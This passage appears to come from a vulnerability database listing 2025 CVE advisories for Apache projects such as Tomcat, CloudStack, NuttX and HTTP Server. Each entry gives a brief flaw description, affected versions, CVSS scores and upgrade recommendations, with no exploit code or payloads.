Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.5, from 10.1.0-M1 through 10.1.39, from 9.0.0.M1 through 9.0.102. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version [FIXED_VERSION], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-31672

Improper Input Validation vulnerability in Apache POI. The issue affects the parsing of OOXML format files like xlsx, docx and pptx. These file formats are basically zip files and it is possible for malicious users to add zip entries with duplicate names (including the path) in the zip. In this case, products reading the affected file could read different data because 1 of the zip entries with the duplicate name is selected over another but different products may choose a different zip entry. This issue affects Apache POI poi-ooxml before 5.4.0. poi-ooxml 5.4.0 has a check that throws an exception if zip entries with duplicate file names are found in the input file. Users are recommended to upgrade to version poi-ooxml 5.4.0, which fixes the issue. Please read https://poi.apache.org/security.html for recommendations about how to use the POI libraries securely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache poi *
CVE-2025-31698

ACL configured in ip_allow.config or remap.config does not use IP addresses that are provided by PROXY protocol. Users can use a new setting (proxy.config.acl.subjects) to choose which IP addresses to use for the ACL if Apache Traffic Server is configured to accept PROXY protocol.  This issue affects undefined: from 10.0.0 through 10.0.6, from 9.0.0 through 9.2.10. Users are recommended to upgrade to version 9.2.11 or 10.0.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2025-32896

# Summary Unauthorized users can perform Arbitrary File Read and Deserialization attack by submit job using restful api-v1. # Details Unauthorized users can access `/hazelcast/rest/maps/submit-job` to submit job. An attacker can set extra params in mysql url to perform Arbitrary File Read and Deserialization attack. This issue affects Apache SeaTunnel: <=2.3.10 # Fixed Users are recommended to upgrade to version 2.3.11, and enable restful api-v2 & open https two-way authentication , which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache seatunnel *
CVE-2025-32897

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This security vulnerability is the same as CVE-2024-47552, but the version range described in the CVE-2024-47552 definition is too narrow. This issue affects Apache Seata (incubating): from 2.0.0 before 2.3.0. Severity Justification: The Apache Seata security team assesses the severity of this vulnerability as "Low" due to stringent real-world mitigating factors. First, the vulnerability is strictly isolated to the Raft cluster mode, an optional and non-default feature introduced in v2.0.0, while most users rely on the unaffected traditional architecture. Second, Seata is an internal middleware; communication between TC and RM/TM occurs entirely within trusted internal networks. An attacker would require prior, unauthorized access to the Intranet to exploit this, making external exploitation highly improbable. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata *
CVE-2025-33042

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Avro Java SDK when generating specific records from untrusted Avro schemas. This issue affects Apache Avro Java SDK: all versions through 1.11.4 and version 1.12.0. Users are recommended to upgrade to version 1.12.1 or 1.11.5, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache avro 1.12.0
apache avro *
CVE-2025-35003

Improper Restriction of Operations within the Bounds of a Memory Buffer and Stack-based Buffer Overflow vulnerabilities were discovered in Apache NuttX RTOS Bluetooth Stack (HCI and UART components) that may result in system crash, denial of service, or arbitrary code execution, after receiving maliciously crafted packets. NuttX's Bluetooth HCI/UART stack users are advised to upgrade to version 12.9.0, which fixes the identified implementation issues. This issue affects Apache NuttX: from 7.25 before 12.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-3891

A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
secalert@redhat.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
redhat enterprise_linux 7.0
apache http_server -
redhat enterprise_linux 9.0
redhat enterprise_linux 8.0
debian debian_linux 11.0
CVE-2025-46392

Uncontrolled Resource Consumption vulnerability in Apache Commons Configuration 1.x. There are a number of issues in Apache Commons Configuration 1.x that allow excessive resource consumption when loading untrusted configurations or using unexpected usage patterns. The Apache Commons Configuration team does not intend to fix these issues in 1.x. Apache Commons Configuration 1.x is still safe to use in scenario's where you only load trusted configurations. Users that load untrusted configurations or give attackers control over usage patterns are recommended to upgrade to the 2.x version line, which fixes these issues. Apache Commons Configuration 2.x is not a drop-in replacement, but as it uses a separate Maven groupId and Java package namespace they can be loaded side-by-side, making it possible to do a gradual migration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache commons_configuration *
CVE-2025-46548

If you enable Basic Authentication in Pekko Management using the Java DSL, the authenticator may not be properly applied. Users that rely on authentication instead of making sure the Management API ports are only available to trusted users are recommended to upgrade to version 1.1.1, which fixes this issue. Akka was affected by the same issue and has released the fix in version 1.6.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache pekko_management *
akka akka_management *
CVE-2025-46647

A vulnerability of plugin openid-connect in Apache APISIX. This vulnerability will only have an impact if all of the following conditions are met: 1. Use the openid-connect plugin with introspection mode 2. The auth service connected to openid-connect provides services to multiple issuers 3. Multiple issuers share the same private key and relies only on the issuer being different If affected by this vulnerability, it would allow an attacker with a valid account on one of the issuers to log into the other issuer. This issue affects Apache APISIX: until 3.12.0. Users are recommended to upgrade to version 3.12.0 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.6 3.6

Products Affected

Vendor Product Version
apache apisix *
CVE-2025-46701

Improper Handling of Case Sensitivity vulnerability in Apache Tomcat's GCI servlet allows security constraint bypass of security constraints that apply to the pathInfo component of a URI mapped to the CGI servlet. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.6, from 10.1.0-M1 through 10.1.40, from 9.0.0.M1 through 9.0.104. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.7, 10.1.41 or 9.0.105, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-46762

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code. While 1.15.1 introduced a fix to restrict untrusted packages, the default setting of trusted packages still allows malicious classes from these packages to be executed. The exploit is only applicable if the client code of parquet-avro uses the "specific" or the "reflect" models deliberately for reading Parquet files. ("generic" model is not impacted) Users are recommended to upgrade to 1.15.2 or set the system property "org.apache.parquet.avro.SERIALIZABLE_PACKAGES" to an empty string on 1.15.1. Both are sufficient to fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache parquet *
CVE-2025-47410

Apache Geode is vulnerable to CSRF attacks through GET requests to the Management and Monitoring REST API that could allow an attacker who has tricked a user into giving up their Geode session credentials to submit malicious commands on the target system on behalf of the authenticated user. This issue affects Apache Geode: versions 1.10 through 1.15.1 Users are recommended to upgrade to version 1.15.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache geode *
CVE-2025-47411

A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator.  This vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues. This issue affects Apache StreamPipes: through 0.97.0. Users are recommended to upgrade to version 0.98.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2025-47436

Heap-based Buffer Overflow vulnerability in Apache ORC. A vulnerability has been identified in the ORC C++ LZO decompression logic, where specially crafted malformed ORC files can cause the decompressor to allocate a 250-byte buffer but then attempts to copy 295 bytes into it. It causes memory corruption. This issue affects Apache ORC C++ library: through 1.8.8, from 1.9.0 through 1.9.5, from 2.0.0 through 2.0.4, from 2.1.0 through 2.1.1. Users are recommended to upgrade to version 1.8.9, 1.9.6, 2.0.5, and 2.1.2, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache orc *
CVE-2025-47713

A privilege escalation vulnerability exists in Apache CloudStack versions 4.10.0.0 through 4.20.0.0 where a malicious Domain Admin user in the ROOT domain can reset the password of user-accounts of Admin role type. This operation is not appropriately restricted and allows the attacker to assume control over higher-privileged user-accounts. A malicious Domain Admin attacker can impersonate an Admin user-account and gain access to sensitive APIs and resources that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0, which fixes the issue with the following: * Strict validation on Role Type hierarchy: the caller's user-account role must be equal to or higher than the target user-account's role. * API privilege comparison: the caller must possess all privileges of the user they are operating on. * Two new domain-level settings (restricted to the default Admin):  - role.types.allowed.for.operations.on.accounts.of.same.role.type: Defines which role types are allowed to act on users of the same role type. Default: "Admin, DomainAdmin, ResourceAdmin".    - allow.operations.on.users.in.same.account: Allows/disallows user operations within the same account. Default: true.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-47849

A privilege escalation vulnerability exists in Apache CloudStack versions 4.10.0.0 through 4.20.0.0 where a malicious Domain Admin user in the ROOT domain can get the API key and secret key of user-accounts of Admin role type in the same domain. This operation is not appropriately restricted and allows the attacker to assume control over higher-privileged user-accounts. A malicious Domain Admin attacker can impersonate an Admin user-account and gain access to sensitive APIs and resources that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0, which fixes the issue with the following: * Strict validation on Role Type hierarchy: the caller's role must be equal to or higher than the target user's role.  * API privilege comparison: the caller must possess all privileges of the user they are operating on.  * Two new domain-level settings (restricted to the default admin):   - role.types.allowed.for.operations.on.accounts.of.same.role.type: Defines which role types are allowed to act on users of the same role type. Default: "Admin, DomainAdmin, ResourceAdmin".   - allow.operations.on.users.in.same.account: Allows/disallows user operations within the same account. Default: true.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-47868

Out-of-bounds Write resulting in possible Heap-based Buffer Overflow vulnerability was discovered in tools/bdf-converter font conversion utility that is part of Apache NuttX RTOS repository. This standalone program is optional and neither part of NuttX RTOS nor Applications runtime, but active bdf-converter users may be affected when this tool is exposed to external provided user data data (i.e. publicly available automation). This issue affects Apache NuttX: from 6.9 before 12.9.0. Users are recommended to upgrade to version 12.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-47869

Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability was discovered in Apache NuttX RTOS apps/exapmles/xmlrpc application. In this example application device stats structure that stored remotely provided parameters had hardcoded buffer size which could lead to buffer overflow. Structure members buffers were updated to valid size of CONFIG_XMLRPC_STRINGSIZE+1. This issue affects Apache NuttX RTOS users that may have used or base their code on example application as presented in releases from 6.22 before 12.9.0. Users of XMLRPC in Apache NuttX RTOS are advised to review their code for this pattern and update buffer sizes as presented in the version of the example in release 12.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48208

Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache HertzBeat . The attacker needs to have an authenticated account with access, and the attack can only be triggered by crafting custom commands. A successful attack would result in arbitrary script execution. This issue affects Apache HertzBeat: through 1.7.2. Users are recommended to upgrade to version [1.7.3], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-48392

A vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.3.3 through 1.3.4, from 2.0.1-beta through 2.0.4. Users are recommended to upgrade to version 2.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-48431

Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. Description: Specially crafted requests can crash an c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2025-48459

Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 2.0.5. Users are recommended to upgrade to version 2.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-48734

Improper Access Control vulnerability in Apache Commons. A special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default. Releases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum’s class loader via the “declaredClass” property available on all Java “enum” objects. Accessing the enum’s “declaredClass” allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty(). Starting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the “declaredClass” property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user's guide and the unit tests. This issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils 1.x are recommended to upgrade to version 1.11.0, which fixes the issue. Users of the artifact org.apache.commons:commons-beanutils2 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache commons_beanutils 2.0.0
apache commons_beanutils *
CVE-2025-48768

Release of Invalid Pointer or Reference vulnerability was discovered in fs/inode/fs_inoderemove code of the Apache NuttX RTOS that allowed root filesystem inode removal leading to a debug assert trigger (that is disabled by default), NULL pointer dereference (handled differently depending on the target architecture), or in general, a Denial of Service. This issue affects Apache NuttX RTOS: from 10.0.0 before 12.10.0. Users of filesystem based services with write access that were exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.10.0 that fixes the issue.

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48769

Use After Free vulnerability was discovered in fs/vfs/fs_rename code of the Apache NuttX RTOS, that due recursive implementation and single buffer use by two different pointer variables allowed arbitrary user provided size buffer reallocation and write to the previously freed heap chunk, that in specific cases could cause unintended virtual filesystem rename/move operation results. This issue affects Apache NuttX RTOS: from 7.20 before 12.11.0. Users of virtual filesystem based services with write access especially when exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.11.0 that fixes the issue.

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48795

Apache CXF stores large stream based messages as temporary files on the local filesystem. A bug was introduced which means that the entire temporary file is read into memory and then logged. An attacker might be able to exploit this to cause a denial of service attack by causing an out of memory exception. In addition, it is possible to configure CXF to encrypt temporary files to prevent sensitive credentials from being cached unencrypted on the local filesystem, however this bug means that the cached files are written out to logs unencrypted. Users are recommended to upgrade to versions 3.5.11, 3.6.6, 4.0.7 or 4.1.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache cxf 4.0.6
apache cxf 3.5.10
apache cxf 4.1.0
apache cxf 3.6.5
CVE-2025-48912

An authenticated malicious actor using specially crafted requests could bypass row level security configuration by injecting SQL into 'sqlExpression' fields. This allowed the execution of sub-queries to evade parsing defenses ultimately granting unauthorized access to data. This issue affects Apache Superset: before 4.1.2. Users are recommended to upgrade to version 4.1.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-48913

If untrusted users are allowed to configure JMS for Apache CXF, previously they could use RMI or LDAP URLs, potentially leading to code execution capabilities. This interface is now restricted to reject those protocols, removing this possibility. Users are recommended to upgrade to versions 3.6.8, 4.0.9 or 4.1.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cxf *
CVE-2025-48924

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache commons_lang *
CVE-2025-48976

Allocation of resources for multipart headers with insufficient limits enabled a DoS vulnerability in Apache Commons FileUpload. This issue affects Apache Commons FileUpload: from 1.0 before 1.6; from 2.0.0-M1 before 2.0.0-M4. Users are recommended to upgrade to versions 1.6 or 2.0.0-M4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache commons_fileupload *
apache commons_fileupload 2.0.0
CVE-2025-48988

Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-48989

Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-49124

Untrusted Search Path vulnerability in Apache Tomcat installer for Windows. During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0 through 10.1.41, from 9.0.23 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100 and 7.0.95 through 7.0.109. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.4 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 2.5 5.9

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-49125

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Tomcat.  When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-49630

In certain proxy configurations, a denial of service attack against Apache HTTP Server versions 2.4.26 through to 2.4.63 can be triggered by untrusted clients causing an assertion in mod_proxy_http2. Configurations affected are a reverse proxy is configured for an HTTP/2 backend, with ProxyPreserveHost set to "on".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-49656

Users with administrator access can create databases files outside the files area of the Fuseki server. This issue affects Apache Jena version up to 5.4.0. Users are recommended to upgrade to version 5.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache jena *
CVE-2025-49763

ESI plugin does not have the limit for maximum inclusion depth, and that allows excessive memory consumption if malicious instructions are inserted. Users can use a new setting for the plugin (--max-inclusion-depth) to limit it. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.5, from 9.0.0 through 9.2.10. Users are recommended to upgrade to version 9.2.11 or 10.0.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2025-49812

In some mod_ssl configurations on Apache HTTP Server versions through to 2.4.63, an HTTP desynchronisation attack allows a man-in-the-middle attacker to hijack an HTTP session via a TLS upgrade. Only configurations using "SSLEngine optional" to enable TLS upgrades are affected. Users are recommended to upgrade to version 2.4.64, which removes support for TLS upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-50151

File access paths in configuration files uploaded by users with administrator access are not validated. This issue affects Apache Jena version up to 5.4.0. Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jena *
CVE-2025-50213

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) vulnerability in Apache Airflow Providers Snowflake. This issue affects Apache Airflow Providers Snowflake: before 6.4.0. Sanitation of table and stage parameters were added in CopyFromExternalStageToSnowflakeOperator to prevent SQL injection Users are recommended to upgrade to version 6.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

